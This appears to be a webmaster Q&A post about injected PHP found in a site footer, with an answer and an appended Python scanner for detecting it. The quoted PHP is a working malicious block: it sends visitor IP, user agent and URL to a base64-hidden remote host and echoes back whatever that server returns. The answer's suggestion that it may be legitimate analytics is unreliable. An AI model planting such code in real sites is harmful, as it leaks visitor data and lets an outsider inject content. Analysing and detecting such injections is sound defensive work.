Today when I opened my website, ESET NOD32 warned me of a trojan and blocked the website. When I analyzed the code, I found the following code in the footer. What is this code, and what advantages can he (the hacker) get by inserting this code into the website?
```php
<?php
if (!isset($sretry))
{
    global $sretry;
    $sretry = 1;
    // code use global bot statistic
    $suseragent = strtolower($_SERVER['HTTP_USER_AGENT']); // looks google serch bot
    $stcurlhandle = null;
    $stcurllink = "";
    if((strstr($suseragent, 'google') == false)
        &&(strstr($suseragent, 'yahoo') == false)
        &&(strstr($suseragent, 'baidu') == false)
        &&(strstr($suseragent, 'msn') == false)
        &&(strstr($suseragent, 'opera') == false)
        &&(strstr($suseragent, 'chrome') == false)
        &&(strstr($suseragent, 'bing') == false)
        &&(strstr($suseragent, 'safari') == false)
        &&(strstr($suseragent, 'bot') == false)) // bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // create bot analitics
            $stcurllink = base64_decode( 'ahr0cdovl21icm93c2vyc3rhdhmuy29tl3n0yxril3n0yxqucghw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($suseragent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stcurlhandle = curl_init( $stcurllink );
        }
    }
    if ( $stcurlhandle !== null )
    {
        curl_setopt($stcurlhandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stcurlhandle, CURLOPT_TIMEOUT, 6);
        $sresult = @curl_exec($stcurlhandle);
        if ($sresult[0]=="o")
        {
            $sresult[0]=" ";
            echo $sresult; // statistic code end
        }
        curl_close($stcurlhandle);
    }
}
?>
```
It looks like some sort of analytics code to me. It sends details on the URL requested, remote IP address, browser user-agent, etc. to "http://mbrowserstats.com/stath/stat.php". I'm not familiar with the particular site; it may be legit. Antivirus software reports these things incorrectly.
Based on a few searches, it seems a bit 50/50. It seems it doesn't do huge harm, but it may be distributed by hacking. A few sample pages where I found it:
- http://www.wjunction.com/16-webmaster-discussion/166680-site-hacked-here-code-pls-help.html
- http://ninjafirewall.com/malware/index.php?threat=2013-02-22.01
- http://onlinelinkscan.com/results/mbrowserstats-comstatestat-php/
- http://www.statscrop.com/www/mbrowserstats.com
It's probably safest to remove it, and follow some of the suggestions on preventing reoccurrence.
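
A defensive check for the pattern in the injected footer block, added here as an example and not part of the original question or answer: it decodes `base64_decode()` string literals in PHP source and flags files where a decoded URL sits next to a `curl_exec()` call. The function names, the sample input and the `stats.example.invalid` URL are constructed for illustration.

```python
import base64
import binascii
import re

# base64_decode('...') or base64_decode("...") with a string literal argument
B64_CALL = re.compile(r"""base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""", re.I)
URL = re.compile(r"^https?://[^\s'\"<>]+$", re.I)


def decoded_urls(php_source):
    """Return URLs hidden in base64_decode() string literals."""
    urls = []
    for match in B64_CALL.finditer(php_source):
        literal = "".join(match.group(2).split())
        try:
            text = base64.b64decode(literal, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64 or not text: ignore
        if URL.match(text):
            urls.append(text)
    return urls


def scan(php_source):
    """Score one file against the traits of the injected footer block."""
    lowered = php_source.lower()
    findings = {
        "hidden_urls": decoded_urls(php_source),
        "fetches_remote": "curl_exec" in lowered,
        "keys_on_user_agent": "http_user_agent" in lowered,
        "echoes_response": re.search(r"echo\s+\$\w+\s*;", php_source) is not None,
    }
    findings["suspicious"] = bool(findings["hidden_urls"]) and findings["fetches_remote"]
    return findings


# Constructed sample (not the page's code); the URL is a placeholder.
_ENC = base64.b64encode(b"http://stats.example.invalid/stat.php").decode()
SAMPLE_INFECTED = (
    "<?php $ua = strtolower($_SERVER['HTTP_USER_AGENT']);\n"
    "$h = curl_init(base64_decode('" + _ENC + "').'?ip='.urlencode($_SERVER['REMOTE_ADDR']));\n"
    "curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);\n"
    "$r = @curl_exec($h); echo $r; ?>"
)
SAMPLE_CLEAN = "<?php echo base64_decode('aGVsbG8='); ?>"  # decodes to 'hello'

if __name__ == "__main__":
    for name, src in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(name, scan(src))
```

Run `scan()` over every `.php` file under the web root and compare hits against a known-good copy of the site; a hit in a footer or theme file that the clean copy lacks is the injected block.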